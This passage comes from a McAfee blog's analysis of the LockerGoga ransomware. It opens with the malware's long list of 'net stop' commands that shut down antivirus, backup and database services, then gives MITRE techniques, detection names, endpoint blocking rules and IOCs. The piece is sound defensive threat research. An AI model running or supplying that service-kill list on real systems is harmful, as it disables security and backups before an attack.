\/y<\/strong><\/td>\n<td width=\"340\">net stop MSExchangeIS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop FA_Scheduler \/y<\/strong><\/td>\n<td width=\"340\">net stop MSExchangeMGMT \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop IISAdmin \/y<\/strong><\/td>\n<td width=\"340\">net stop MSExchangeMTA \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop IMAP4Svc \/y<\/strong><\/td>\n<td width=\"340\">net stop MSExchangeSA \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop macmnsvc \/y<\/strong><\/td>\n<td width=\"340\">net stop MSExchangeSRS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop masvc \/y<\/strong><\/td>\n<td width=\"340\">net stop MSOLAP$SQL_2008 \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MBAMService \/y<\/strong><\/td>\n<td width=\"340\">net stop MSOLAP$SYSTEM_BGC \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MBEndpointAgent \/y<\/strong><\/td>\n<td width=\"340\">net stop MSOLAP$TPS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop McShield \/y<\/strong><\/td>\n<td width=\"340\">net stop MSSQLFDLauncher$TPS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSOLAP$TPSAMA \/y<\/strong><\/td>\n<td width=\"340\">net stop MSSQLFDLauncher$TPSAMA \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$BKUPEXEC \/y<\/strong><\/td>\n<td width=\"340\">net stop MSSQLSERVER \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$ECWDB2 \/y<\/strong><\/td>\n<td width=\"340\">net stop MSSQLServerADHelper100 \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$PRACTICEMGT \/y<\/strong><\/td>\n<td width=\"340\">net stop MSSQLServerOLAPService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$PRACTTICEBGC \/y<\/strong><\/td>\n<td width=\"340\">net stop MySQL57 \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$PROFXENGAGEMENT \/y<\/strong><\/td>\n<td width=\"340\">net stop ntrtscan \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$SBSMONITORING \/y<\/strong><\/td>\n<td width=\"340\">net stop OracleClientCache80 \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$SHAREPOINT \/y<\/strong><\/td>\n<td width=\"340\">net stop PDVFSService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$SQL_2008 \/y<\/strong><\/td>\n<td width=\"340\">net stop POP3Svc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$SYSTEM_BGC \/y<\/strong><\/td>\n<td width=\"340\">net stop ReportServer \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$TPS \/y<\/strong><\/td>\n<td width=\"340\">net stop ReportServer$SQL_2008 \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$TPSAMA \/y<\/strong><\/td>\n<td width=\"340\">net stop ReportServer$SYSTEM_BGC \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$VEEAMSQL2008R2 \/y<\/strong><\/td>\n<td width=\"340\">net stop ReportServer$TPS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$VEEAMSQL2012 \/y<\/strong><\/td>\n<td width=\"340\">net stop ReportServer$TPSAMA \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQLFDLauncher \/y<\/strong><\/td>\n<td width=\"340\">net stop RESvc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQLFDLauncher$PROFXENGAGEMENT \/y<\/strong><\/td>\n<td width=\"340\">net stop sacsvr \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQLFDLauncher$SBSMONITORING \/y net stop MSSQLFDLauncher$SHAREPOINT \/y<\/strong><\/td>\n<td width=\"340\">net stop SamSs \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQLFDLauncher$SQL_2008 \/y<\/strong><\/td>\n<td width=\"340\">net stop SAVAdminService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQLFDLauncher$SYSTEM_BGC \/y<\/strong><\/td>\n<td width=\"340\">net stop SAVService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSOLAP$TPSAMA \/y<\/strong><\/td>\n<td width=\"340\">net stop MSSQLFDLauncher$TPS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$BKUPEXEC \/y<\/strong><\/td>\n<td width=\"340\">net stop MSSQLFDLauncher$TPSAMA \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SDRSVC \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLSafeOLRService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SepMasterService \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLSERVERAGENT \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop ShMonitor \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLTELEMETRY \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop Smcinst \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLTELEMETRY$ECWDB2 \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SmcService \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLWriter \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SMTPSvc \/y<\/strong><\/td>\n<td width=\"340\">net stop SstpSvc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SNAC \/y<\/strong><\/td>\n<td width=\"340\">net stop svcGenericHost \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SntpService \/y<\/strong><\/td>\n<td width=\"340\">net stop swi_filter \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop sophossps \/y<\/strong><\/td>\n<td width=\"340\">net stop swi_service \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$BKUPEXEC \/y<\/strong><\/td>\n<td width=\"340\">net stop swi_update_64 \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$ECWDB2 \/y<\/strong><\/td>\n<td width=\"340\">net stop TmCCSF \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$PRACTTICEBGC \/y<\/strong><\/td>\n<td width=\"340\">net stop tmlisten \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$PRACTTICEMGT \/y<\/strong><\/td>\n<td width=\"340\">net stop TrueKey \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$PROFXENGAGEMENT \/y<\/strong><\/td>\n<td width=\"340\">net stop TrueKeyScheduler \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$SBSMONITORING \/y<\/strong><\/td>\n<td width=\"340\">net stop TrueKeyServiceHelper \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$SHAREPOINT \/y net stop SQLAgent$SQL_2008 \/y<\/strong><\/td>\n<td width=\"340\">net stop UI0Detect \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$SYSTEM_BGC \/y net stop SQLAgent$TPS \/y<\/strong><\/td>\n<td width=\"340\">net stop VeeamBackupSvc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$TPSAMA \/y<\/strong><\/td>\n<td width=\"340\">net stop VeeamBrokerSvc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$VEEAMSQL2008R2 \/y net stop SQLAgent$VEEAMSQL2012 \/y<\/strong><\/td>\n<td width=\"340\">net stop VeeamCatalogSvc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLBrowser \/y<\/strong><\/td>\n<td width=\"340\">net stop VeeamCloudSvc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SDRSVC \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLSafeOLRService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SepMasterService \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLSERVERAGENT \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop ShMonitor \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLTELEMETRY \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop VeeamDeploymentService \/y<\/strong><\/td>\n<td width=\"340\">net stop NetMsmqActivator \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop VeeamDeploySvc \/y<\/strong><\/td>\n<td width=\"340\">net stop EhttpSrv \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop VeeamEnterpriseManagerSvc \/y<\/strong><\/td>\n<td width=\"340\">net stop ekrn \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop VeeamMountSvc \/y<\/strong><\/td>\n<td width=\"340\">net stop ESHASRV \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop VeeamNFSSvc \/y<\/strong><\/td>\n<td width=\"340\">net stop MSSQL$SOPHOS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop VeeamRESTSvc \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLAgent$SOPHOS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop VeeamTransportSvc \/y<\/strong><\/td>\n<td width=\"340\">net stop AVP \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop W3Svc \/y<\/strong><\/td>\n<td width=\"340\">net stop klnagent \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop wbengine \/y<\/strong><\/td>\n<td width=\"340\">net stop MSSQL$SQLEXPRESS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop WRSVC \/y<\/strong><\/td>\n<td width=\"340\">net stop SQLAgent$SQLEXPRESS \/y net stop wbengine \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$VEEAMSQL2008R2 \/y<\/strong><\/td>\n<td width=\"340\">net stop kavfsslp \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$VEEAMSQL2008R2 \/y net stop VeeamHvIntegrationSvc \/y<\/strong><\/td>\n<td width=\"340\">net stop KAVFSGT \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop swi_update \/y<\/strong><\/td>\n<td width=\"340\">net stop KAVFS \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$CXDB \/y<\/strong><\/td>\n<td width=\"340\">net stop mfefire \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$CITRIX_METAFRAME \/y net stop &#8220;SQL Backups&#8221; \/y<\/strong><\/td>\n<td width=\"340\">net stop &#8220;avast! Antivirus&#8221; \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$PROD \/y<\/strong><\/td>\n<td width=\"340\">net stop aswBcc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop &#8220;Zoolz 2 Service&#8221; \/y<\/strong><\/td>\n<td width=\"340\">net stop &#8220;Avast Business Console Client Antivirus Service&#8221; \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQLServerADHelper \/y<\/strong><\/td>\n<td width=\"340\">net stop mfewc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$PROD \/y<\/strong><\/td>\n<td width=\"340\">net stop Telemetryserver \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop msftesql$PROD \/y<\/strong><\/td>\n<td width=\"340\">net stop WdNisSvc \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop WinDefend \/y<\/strong><\/td>\n<td width=\"340\">net stop EPUpdateService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MCAFEETOMCATSRV530 \/y<\/strong><\/td>\n<td width=\"340\">net stop TmPfw \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MCAFEEEVENTPARSERSRV \/y<\/strong><\/td>\n<td width=\"340\">net stop SentinelAgent \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQLFDLauncher$ITRIS \/y<\/strong><\/td>\n<td width=\"340\">net stop SentinelHelperService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$EPOSERVER \/y<\/strong><\/td>\n<td width=\"340\">net stop LogProcessorService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQL$ITRIS \/y<\/strong><\/td>\n<td width=\"340\">net stop EPUpdateService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$EPOSERVER \/y<\/strong><\/td>\n<td width=\"340\">net stop TmPfw \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLAgent$ITRIS \/y<\/strong><\/td>\n<td width=\"340\">net stop SentinelAgent \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SQLTELEMETRY$ITRIS \/y<\/strong><\/td>\n<td width=\"340\">net stop SentinelHelperService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MsDtsServer130 \/y<\/strong><\/td>\n<td width=\"340\">net stop LogProcessorService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop SSISTELEMETRY130 \/y<\/strong><\/td>\n<td width=\"340\">net stop EPUpdateService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop MSSQLLaunchpad$ITRIS \/y<\/strong><\/td>\n<td width=\"340\">net stop TmPfw \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop BITS \/y<\/strong><\/td>\n<td width=\"340\">net stop SentinelAgent \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop BrokerInfrastructure \/y<\/strong><\/td>\n<td width=\"340\">net stop EPProtectedService \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop epag \/y<\/strong><\/td>\n<td width=\"340\">net stop epredline \/y<\/td>\n<\/tr>\n<tr>\n<td width=\"307\"><strong>net stop EPIntegrationService \/y<\/strong><\/td>\n<td width=\"340\">net stop EPSecurityService \/y<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>New ransomware, new features, but still room to improve<\/h2>\n<p>We will continue tracking LockerGoga, but we have already seen some interesting features never seen before, such as parallel tasking encrypting the system or log files for debugger purposes. We did not see any spreading method used to deliver LockerGoga so it would be fair to assume it is used in targeted campaigns after the attackers had access to the system. At the time of this analysis, all the samples are not packed, or have complex methods of protection from being executed inside a sandbox system, though this could change in the near future.<\/p>\n<p>Also, during the analysis, we observed LockerGoga encrypting legitimate DLLs, breaking the functionality of certain applications in the system, and also ciphering itself during the process, causing a crash:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-95067 size-large\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2019\/04\/Broken-functionality-1024x427.png\" alt=\"\" width=\"1024\" height=\"427\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Broken-functionality-1024x427.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Broken-functionality-300x125.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Broken-functionality-768x321.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Broken-functionality-1198x500.png 1198w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Broken-functionality.png 1246w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>We expect all these errors will be fixed with further development of the malware.<\/p>\n<h2>Observations:<\/h2>\n<p>The McAfee ATR team is observing how some new ransomware players in the cybersecurity field are reusing, or at least only making some minor modifications to, some features used by other ransomware families.<\/p>\n<p>In the case of LockerGoga we can observe the following in:<\/p>\n<ul>\n<li>Sectigo as a certificate, also used to digitally sign the certificate<\/li>\n<li>Ransom note slightly modified from Ryuk Ransomware<\/li>\n<li>Specific FileMarker used to flag the encrypted files<\/li>\n<li>No BTC address used in the ransom note, meaning victims must make contact directly by email, something that we have seen elsewhere in our latest investigations.<\/li>\n<\/ul>\n<h2>MITRE ATT&amp;CK Coverage:<\/h2>\n<p>Hooking<\/p>\n<p>Kernel Modules and Extensions<\/p>\n<p>Process Injection<\/p>\n<p>Code Signing<\/p>\n<p>Query Registry<\/p>\n<p>Process Discovery<\/p>\n<p>Data Compressed<\/p>\n<h2>McAfee coverage:<\/h2>\n<p><strong>Detection names:\u00a0<\/strong><\/p>\n<p>RansomCLock-FAL!A5BC1F94E750<\/p>\n<p>Ransom-Goga!E11502659F6B<\/p>\n<p>Trojan-Ransom<\/p>\n<p>Ransom-Goga!438EBEC995AD<\/p>\n<p>Trojan-FQSS!3B200C8173A9<\/p>\n<p>RansomCLock-FAL!A1D732AA27E1<\/p>\n<p>Ransom-Goga!C2DA604A2A46<\/p>\n<p>Ransom-O<\/p>\n<p>Trojan-FPYT!BA53D8910EC3<\/p>\n<p>Ransom-FQPT!FAF4DE4E1C5D<\/p>\n<p>RansomCLock-FAL!3EBCA21B1D4E<\/p>\n<p>RansomCLock-FAL!E8C7C902BCB2<\/p>\n<p>Ransom-Goga!E11502659F6B<\/p>\n<p>Generic.bvg<\/p>\n<p>Ransom-Goga!16BCC3B7F32C<\/p>\n<p><strong>Expert Rules<\/strong><\/p>\n<p>The following expert rules can be used in Endpoint Security to block the malware from spreading. These rules are aggressive and may cause false positives, so make sure they are removed once the environment is cleaned:<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"566\">Rule {<\/p>\n<p>Process {<\/p>\n<p>Include OBJECT_NAME { -v &#8220;SYSTEM:REMOTE&#8221; }<\/p>\n<p>}<\/p>\n<p>Target {<\/p>\n<p>Match FILE {<\/p>\n<p>Include OBJECT_NAME { -v &#8220;c:\\\\windows\\\\temp\\\\*.exe&#8221; }<\/p>\n<p>Include OBJECT_NAME { -v &#8220;c:\\\\windows\\\\temp\\\\*.bat&#8221; }<\/p>\n<p>Include -access &#8220;CREATE&#8221;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>Rule {<\/p>\n<p>Process {<\/p>\n<p>Include OBJECT_NAME { -v &#8220;WmiPrvSE.exe&#8221; }<\/p>\n<p>}<\/p>\n<p>Target {<\/p>\n<p>Match PROCESS {<\/p>\n<p>Include OBJECT_NAME { -v &#8220;cmd.exe&#8221;}<\/p>\n<p>Include -access &#8220;CREATE&#8221;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>}<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:<\/p>\n<p>Prescriptive guidance<\/p>\n<p>It is advisable for customers to undertake appropriate risk assessment to determine if this threat has a high probability of targeting their environments.\u00a0 Whilst the above detailed known samples are incorporated within McAfee technologies, customers can also add the following Access Protection rules to prevent the creation of encrypted files on the victim host:<\/p>\n<p>Executables:<\/p>\n<ul>\n<li>Inclusion Status: Include<\/li>\n<li>File Name or Path: *<\/li>\n<li>SubRule:<\/li>\n<\/ul>\n<p>SubRule:<\/p>\n<ul>\n<li>Type: File<\/li>\n<li>Operations: Create<\/li>\n<li>Targets:\n<ul>\n<li>Target 1:\n<ul>\n<li>Include<\/li>\n<li>Files: *.locked<\/li>\n<\/ul>\n<\/li>\n<li>Target 2:\n<ul>\n<li>Include<\/li>\n<li>Destination file: *.locked<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Customers can also add the following Access Protection rule to prevent the creation of encrypted files on the victim host:<\/p>\n<ul>\n<li>File\/Folder Access Protection Rule: Processes tInclude: *<\/li>\n<li>File or folder name tblock: *.locked<\/li>\n<li>File actions tprevent: New files being create<\/li>\n<\/ul>\n<p><strong>Access Protection Rules:<\/strong><\/p>\n<p>Customers can also add Access Protection rules matching these characteristics: Prevent Creation\\Execution of:<\/p>\n<ul>\n<li>c:\\windows\\temp\\x??.bat<\/li>\n<li>c:\\windows\\temp\\kill.bat<\/li>\n<li>c:\\windows\\temp\\taskhost.exe<\/li>\n<\/ul>\n<p>Prevent execution of binaries signed with SN:<\/p>\n<ul>\n<li>C=GB, PostalCode=DT3 4DD, S=WEYMOUTH, L=WEYMOUTH, STREET=16 Australia Road Chickerell,<\/li>\n<li>O=MIKL LIMITED, CN=MIKL LIMITED<\/li>\n<li>C=GB, PostalCode=WC2H 9JQ, S=LONDON, L=LONDON, STREET=71-75 Shelton Street Covent<\/li>\n<li>Garden, O=ALISA LTD, CN=ALISA LTD<\/li>\n<li>C=GB, PostalCode=EC1V 2NX, S=LONDON, L=LONDON, STREET=Kemp House 160 City Road,<\/li>\n<li>O=KITTY&#8217;S LTD, CN=KITTY&#8217;S LTD<\/li>\n<\/ul>\n<h2>YARA RULE<\/h2>\n<p>We have a YARA rule available on our ATR <a href=\"https:\/\/l.facebook.com\/l.php?u=https%3A%2F%2Fgithub.com%2Fadvanced-threat-research%2FYara-Rules%2Fblob%2Fmaster%2Fransomware%2FRANSOM_LockerGoga.yar%3Ffbclid%3DIwAR33s8WdUh0YqfKidcU6BYLfifLQ71KJ-XCRRbnm1Inw9rAWTkrVUWZJYcc&amp;h=AT36rrDm_KmiO4hukL42KxnZvSwlsL0aVAEbauYK3E5Kut0XaLwSm3Uuv-AcHXEdh1ZmYQIoJeW5OiIQPhqiPyAKbMjUZKgD27yknOLkKv7qrcyxdrJ5zijUbvLt6fZjpiGqUp1qtw\" target=\"_blank\" rel=\"noopener noreferrer\">github repository:<\/a><\/p>\n<h2>IOCs<\/h2>\n<p>a52f26575556d3c4eccd3b51265cb4e6<\/p>\n<p>ba53d8910ec3e46864c3c86ebd628796<\/p>\n<p>c2da604a2a469b1075e20c5a52ad3317<\/p>\n<p>7e3f8b6b7ac0565bfcbf0a1e3e6fcfbc<\/p>\n<p>3b200c8173a92c94441cb062d38012f6<\/p>\n<p>438ebec995ad8e05a0cea2e409bfd488<\/p>\n<p>16bcc3b7f32c41e7c7222bf37fe39fe6<\/p>\n<p>e11502659f6b5c5bd9f78f534bc38fea<\/p>\n<p>9cad8641ac79688e09c5fa350aef2094<\/p>\n<p>164f72dfb729ca1e15f99d456b7cf811<\/p>\n<p>52340664fe59e030790c48b66924b5bd<\/p>\n<p>174e3d9c7b0380dd7576187c715c4681<\/p>\n<p>3ebca21b1d4e2f482b3eda6634e89211<\/p>\n<p>a1d732aa27e1ca2ae45a189451419ed5<\/p>\n<p>e8c7c902bcb2191630e10a80ddf9d5de<\/p>\n<p>4da135516f3da1c6ca04d17f83b99e65<\/p>\n<p>a5bc1f94e7505a2e73c866551f7996f9<\/p>\n<p>b3d3da12ca3b9efd042953caa6c3b8cd<\/p>\n<p>faf4de4e1c5d8e4241088c90cfe8eddd<\/p>\n<p>dece7ebb578772e466d3ecae5e2917f9<\/p>\n<p>MayarChenot@protonmail[.]com<\/p>\n<p>DharmaParrack@protonmail[.]com<\/p>\n<p>wyattpettigrew8922555@mail[.]com<\/p>\n<p>SayanWalsworth96@protonmail[.]com<\/p>\n<p>SuzuMcpherson@protonmail[.]com<\/p>\n<p>AbbsChevis@protonmail[.]com<\/p>\n<p>QicifomuEjijika@o2[.]pl<\/p>\n<p>RezawyreEdipi1998@o2[.]pl<\/p>\n<p>AsuxidOruraep1999@o2[.]pl<\/p>\n<p>IjuqodiSunovib98@o2[.]pl<\/p>\n<p>aperywsqaroci@o2[.]pl<\/p>\n<p>abbschevis@protonmail[.]com<\/p>\n<p>asuxidoruraep1999@o2[.]pl<\/p>\n<p>cottleakela@protonmail[.]com<\/p>\n<p>couwetizotofo@o2[.]pl<\/p>\n<p>dharmaparrack@protonmail[.]com<\/p>\n<p>dutyuenugev89@o2[.]pl<\/p>\n<p>phanthavongsaneveyah@protonmail[.]com<\/p>\n<p>mayarchenot@protonmail[.]com<\/p>\n<p>ijuqodisunovib98@o2[.]pl<\/p>\n<p>qicifomuejijika@o2[.]pl<\/p>\n<p>rezawyreedipi1998@o2[.]pl<\/p>\n<p>qyavauzehyco1994@o2[.]pl<\/p>\n<p>romanchukeyla@protonmail[.]com<\/p>\n<p>sayanwalsworth96@protonmail[.]com<\/p>\n<p>schreibereleonora@protonmail[.]com<\/p>\n<p>suzumcpherson@protonmail[.]com<\/p>\n<p>wyattpettigrew8922555@mail[.]com<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Co-authored by Marc RiveroLopez. Initial discovery Once again, we have seen a significant new ransomware family in the news. LockerGoga,&#8230;<\/p>\n","protected":false},"author":1170,"featured_media":95077,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[],"coauthors":[6327],"class_list":["post-95044","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-mcafee-labs"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>LockerGoga Ransomware Family Used in Targeted Attacks | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Co-authored by Marc RiveroLopez. Initial discovery Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"LockerGoga Ransomware Family Used in Targeted Attacks | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Co-authored by Marc RiveroLopez. Initial discovery Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2019-04-29T17:10:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-19T03:21:46+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1575\" \/>\n\t<meta property=\"og:image:height\" content=\"1125\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"ATR Operational Intelligence Team\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"ATR Operational Intelligence Team\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/\"},\"author\":{\"name\":\"ATR Operational Intelligence Team\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/668134594f276e8743322ec163337c6f\"},\"headline\":\"LockerGoga Ransomware Family Used in Targeted 